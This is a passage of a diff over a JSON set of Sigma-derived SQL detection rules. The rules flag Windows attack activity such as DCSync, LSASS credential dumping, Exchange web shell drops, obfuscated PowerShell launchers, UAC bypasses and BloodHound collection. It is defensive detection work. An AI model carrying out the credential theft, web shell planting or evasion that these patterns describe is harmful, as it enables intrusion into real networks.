\ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ - "Intended inclusions by 
administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.lateral_movement", + "attack.privilege_escalation", "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + 
"attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR 
OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Valid user was not added to RDP group" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_not_allowed_rdp_access.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert 
Lee @quantum_cookie", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. 
This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND 
ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", 
- "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "BloodHound Collection Files", + "id": 
"02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "SCM Database Privileged Operation", - "id": 
"dae8171c-5ec6-4396-b210-8466585b53e9", - "status": "test", - "description": "Detects non-system users performing privileged operation os the SCM database", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4674' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'servicesactive' AND PrivilegeList = 'SeTakeOwnershipPrivilege') AND NOT (SubjectLogonId = '0x3e4' AND ProcessName LIKE '%:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\'))" - ], - "filename": "win_security_scm_database_privileged_operation.yml" - }, - { - "title": "Failed Logon From Public IP", - "id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "status": "test", - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "author": "NVISO", - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ], - "falsepositives": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND NOT ((IpAddress LIKE '%-%' ESCAPE '\\') OR ((IpAddress LIKE '10.%' ESCAPE '\\' OR IpAddress LIKE '192.168.%' ESCAPE '\\' OR IpAddress LIKE '172.16.%' ESCAPE '\\' OR IpAddress LIKE '172.17.%' ESCAPE '\\' OR IpAddress LIKE '172.18.%' ESCAPE '\\' OR IpAddress LIKE '172.19.%' ESCAPE '\\' OR IpAddress LIKE '172.20.%' ESCAPE 
'\\' OR IpAddress LIKE '172.21.%' ESCAPE '\\' OR IpAddress LIKE '172.22.%' ESCAPE '\\' OR IpAddress LIKE '172.23.%' ESCAPE '\\' OR IpAddress LIKE '172.24.%' ESCAPE '\\' OR IpAddress LIKE '172.25.%' ESCAPE '\\' OR IpAddress LIKE '172.26.%' ESCAPE '\\' OR IpAddress LIKE '172.27.%' ESCAPE '\\' OR IpAddress LIKE '172.28.%' ESCAPE '\\' OR IpAddress LIKE '172.29.%' ESCAPE '\\' OR IpAddress LIKE '172.30.%' ESCAPE '\\' OR IpAddress LIKE '172.31.%' ESCAPE '\\' OR IpAddress LIKE '127.%' ESCAPE '\\' OR IpAddress LIKE '169.254.%' ESCAPE '\\')) OR (IpAddress = '::1' OR (IpAddress LIKE 'fe80::%' ESCAPE '\\' OR IpAddress LIKE 'fc00::%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_failed_logon_source.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Device Installation Blocked", - "id": "c9eb55c3-b468-40ab-9089-db2862e42137", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects an installation of a device that is forbidden by the system policy", - "author": "frack113", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '6423')" - ], - "filename": "win_security_device_installation_blocked.yml" - }, - { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + 
"attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "status": "experimental", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Ngrok 
